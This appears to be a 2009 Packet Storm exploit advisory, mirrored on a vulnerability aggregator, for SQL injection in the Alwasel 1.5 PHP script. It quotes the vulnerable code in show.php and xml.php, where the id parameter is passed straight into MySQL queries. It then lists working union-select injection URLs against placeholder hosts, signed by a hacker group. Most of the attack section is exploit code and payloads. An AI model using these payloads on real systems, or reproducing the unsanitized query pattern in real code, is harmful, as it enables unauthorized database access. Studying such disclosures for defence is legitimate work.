Alwasel 1.5 SQL Injection

🗓️ 07 Aug 2009 00:00:00Reported by SwEET-DeViLType

packetstorm🔗 packetstormsecurity.com👁 13 Views

Alwasel v1.5 Multiple Remote Vulnerabilities. SQL Injection in Alwasel v1.5 allows remote attackers to execute arbitrary SQL commands

`------------------Alwasel v1.5 Multiple Remote Vulnerabilities----------------------------  
# #### # ### ## ### #### #### ### ## ### #### #### ### # ### #### ######  
## # # ## # # # # # # # # # # # # # # # # # # # ## # # # # # #  
# # # # # # # # # # # # # # # # # # # # # # # # #   
# # ### # # ### # # ## ### ### # # # # ### ## # # # ### #   
#### # # #### # # ###### # # # # # # # # # # # # # # #   
# # # # # # # # # # # # # # ## # # # # # # # ## # #   
## ## ### ## ## #### ### ### #### ### # # ### #### #### ### # ### # #### ###   
  
  
#----------------------------------------------------------------------------------------------------------------  
Script : Alwasel  
version : 1.5  
Language: PHP  
Site: http://www.abushhab.com  
Demo :http://alwasel.abushhab.com/1/  
Info :http://abushhab.com/alwasel.html  
Author: SwEET-DeViL  
#----------------------------------------------------------------------------------------------------------------  
  
)=> show.php  
.................................................................................................................  
if ( $_GET['id'] )  
{  
$qshowcinfo = @mysql_query( "SELECT * FROM cat where id = ".$_GET['id'] ); <==============={  
$nshowcinfo = @mysql_num_rows( $qshowcinfo );  
//###################################################################################################  
if ( $_GET['id'] )  
{  
$qshowsinfo = @mysql_query( "SELECT * FROM site where id = ".$_GET['id']." and ok != 0 and ok != 2" ); <==============={  
$nshowsinfo = @mysql_num_rows( $qshowsinfo );  
  
.................................................................................................................  
#Exploit:  
  
http://WWW.Site.Com/alwasel/show.php?page=cat&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13#--  
  
http://WWW.Site.Com/alwasel/show.php?page=site&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16#--  
  
-----------------------------------------------------------------------------------------------------------------  
  
)=> xml.php  
.................................................................................................................  
if ( $_GET['id'] )  
{  
$qshowcinfo = @mysql_query( "SELECT * FROM cat where id = ".$_GET['id'] ); <==============={  
$nshowcinfo = @mysql_num_rows( $qshowcinfo );  
  
.................................................................................................................  
#Exploit:  
  
http://WWW.Site.Com/alwasel/xml.php?page=cat&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13#--  
  
  
-----------------------------------------------------------------------------------------------------------------  
  
#......>  
  
  
/-------------www.arab4services.net-----------------\  
|+------------------------------------------------+ |  
|| SwEET-DeViL & viP HaCkEr | |  
|| gamr-14(at)hotmail.com | |  
|+------------------------------------------------+ |  
\---------------------------------------------------/  
  
`

07 Aug 2009 00:00Current

0.1Low risk

Vulners AI Score0.1